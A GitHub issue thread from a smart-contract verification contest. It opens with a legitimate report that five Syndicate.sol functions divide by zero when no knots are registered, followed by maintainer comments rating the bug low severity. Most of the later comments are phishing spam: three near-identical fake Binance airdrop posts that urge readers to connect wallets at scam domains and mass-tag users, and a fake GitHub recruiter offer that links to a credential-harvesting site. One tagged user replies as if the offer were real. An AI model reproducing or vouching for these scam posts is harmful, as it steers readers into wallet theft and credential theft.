### ISSUE TITLE
Zero Div

### ISSUE THREAD

**Issue by zapaz** [zapaz/2023-01-19-blockswap-fv#5]
Five functions may reverts due to division by zero, when number of registered knot is zero 

Theses reverts are demonstrated in 5 rules in this spec file :  
https://github.com/zapaz/2023-01-19-blockswap-fv/blob/certora-contest/certora/specs/SyndicateIssues.spec

Inside public `previewUnclaimedETHAsCollateralizedSlotOwner()` function : 
https://github.com/Certora/2023-01-blockswap-fv/blob/certora/contracts/syndicate/Syndicate.sol#L442-L443 
```solidity
uint256 accumulatedSoFar = accumulatedETHPerCollateralizedSlotPerKnot+ 
((calculateETHForFreeFloatingOrCollateralizedHolders() - 
lastSeenETHPerCollateralizedSlotPerKnot) / numberOfRegisteredKnots);
```

Inside public `getUnprocessedETHForAllFreeFloatingSlot()` function 
also called by `calculateNewAccumulatedETHPerCollateralizedSharePerKnot()`: 
https://github.com/Certora/2023-01-blockswap-fv/blob/certora/contracts/syndicate/Syndicate.sol#L484
```solidity
return ((calculateETHForFreeFloatingOrCollateralizedHolders() - 
lastSeenETHPerCollateralizedSlotPerKnot) / numberOfRegisteredKnots);
```

Inside internal `_calculateCollateralizedETHOwedPerKnot()` function :
https://github.com/Certora/2023-01-blockswap-fv/blob/certora/contracts/syndicate/Syndicate.sol#L577
```solidity
uint256 collateralizedSLOTShareOfETHPerKnot = 
(collateralizedSLOTShareOfETH / numberOfRegisteredKnots);
```

Inside internal `_calculateNewAccumulatedETHPerCollateralizedShare()` function : 
https://github.com/Certora/2023-01-blockswap-fv/blob/certora/contracts/syndicate/Syndicate.sol#L583
```solidity
return (_ethSinceLastUpdate * PRECISION) / (numberOfRegisteredKnots * 4 ether);
```

**Comment by vince0656** [comment]
Assessment: Low

We will add more graceful error handling when number of knots is zero. Thank you

**Comment by teryanarmen** [comment]
The bug is in `getUnprocessedETHForAllCollateralizedSlot` not `getUnprocessedETHForAllFreeFloatingSlot`. Since this DOS is only in view functions which are not called by any critical functions, users can still unstake after all knots have been deregistered. Therefore I agree that this is low severity.

**Comment by knofte** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by mkproject-admin** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @douglascorrea, @jer0701, @evegreen, @fiqryq, @AlberErre, @nenjotsu, @NeowuqiLee

**Comment by tarekassioui-git** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @jiangplus, @Sawass5, @manhloki, @fajaruc26, @Dusjka, @Vikas-63k, @gobgoblin, @Nipapan28, @j4w3ny, @MikeKiter, @Arti333lll, @18236663688, @firewbel33, @harno1987, @ogiste, @maupiece8, @Jabenia, @pyaesone1933, @mdferdouswahid, @alvarlaigna, @baysure72, @Cyfa1200, @b0og-g, @prakash5sahu, @jeceiveri, @Eryngerhart, @jamesdfenix, @Peymanniazi, @Dongduongcoin, @yyn618, @theresandu56, @Bishop202, @edowiratno, @rs2869, @maxim151992, @muyangren001, @lhypj, @MetaverseWorldInc, @nika00056, @MahrezDev, @flumpus-dev, @hessamwatchlist, @Kabs1379, @Wpse333x, @Farshid77bz, @greg9762, @notejs, @Sachin0013, @aspenmayer, @Sanaalily1

**Comment by renmadigi** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @

**Comment by PuchkovaAnastasia** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
kevinmcmahon, @discountry, @javierpozzi, @kamalbuilds, @uuhnaut69, @DhruvDave12, @kmiguel10, @bigsml, @rabee198, @augusto404, @smonami, @Muhammad-waqar-uit, @markodayan, @ujjualts, @iakashpatel, @0xDanki, @shinfungible, @bilallirmak, @sexylin2010, @ming-inside

**Comment by DhruvDave12** [comment]
Hello,
Thanks for considering me for the position.
The form page shows 404 when I open it.

Please if you could update the link or the access

Thanks and Regards
Dhruv Dave
